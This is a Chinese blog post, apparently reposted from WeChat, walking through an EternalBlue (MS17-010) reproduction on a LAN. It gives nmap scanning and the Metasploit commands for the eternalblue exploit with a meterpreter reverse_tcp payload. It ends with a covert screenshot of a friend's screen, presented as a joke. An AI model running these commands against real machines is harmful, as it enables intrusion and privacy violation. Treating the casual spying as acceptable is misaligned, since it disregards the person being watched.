前言
测试已经过允许,本文仅供学习交流使用。永恒之蓝是Shadow Brokers在2017年公布的一个网络攻击工具,永恒之蓝利用了Windows系统的SMB(445端口)漏洞获取系统的权限。今天闲来无事,看了看朋友的电脑是win7的系统,于是我打算试一下这个漏洞的复现。
过程记录
1.首先使用nmap扫描局域网内所有开放了445端口的机器
发现有这么多机器都在线,朋友的机器是138,其他的机器就不做测试了
2.接下来就是使用MSF进行漏洞利用了,在此之前,我们需要将kali虚拟机的网络模式设置成桥接模式,这样才能保证kali与朋友的机器在同一局域网内。
3.接下来就是打开kali,使用MSF了。首先查找一下永恒之蓝的验证模块,验证一下朋友的机器是否存在漏洞。接下来图片的文字可能会很小,就委屈一下各位看官大人了。
search ms17-010 #查找永恒之蓝的验证模块
use
auxiliary/scanner/ smb/smb__ms17_010 #使用这个模块
4.设置朋友机器的局域网IP,并运行模块进行验证
set rhosts 10.10.30.138
run
可以看到,结果显示138机器是可能存在永恒之蓝漏洞的,那么接下来就试一试利用吧
5.利用之前,先查看一下我的IP
ifconfig
10.10.30.5与目标机器在同一网段
6.使用永恒之蓝的利用模块
use exploit/windows/smb/ms17_010_eternalblue
设置好payload
set payload
windows/x64/meterpreter/reverse_tcp
设置攻击目标IP
set rhosts 10.10.30.138
设置监听IP
set lhost 10.10.30.5
监听端口就用默认的4444端口就好
查看一下是否设置完毕
show options
没有问题run直接运行起来
7.反弹回来一个session,切换到D盘下,成功查看目录
8.这里有一个骚操作,截图看看朋友在干什么
screenshot
这小子正在编程呢,哈哈哈 溜了溜了
更多文章请关注公众号:星河疯客admin
万水千山总是情,点赞再走行不行的(ง •_•)ง
原文始发于微信公众号(星河疯客admin):记一次永恒之蓝漏洞复现
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论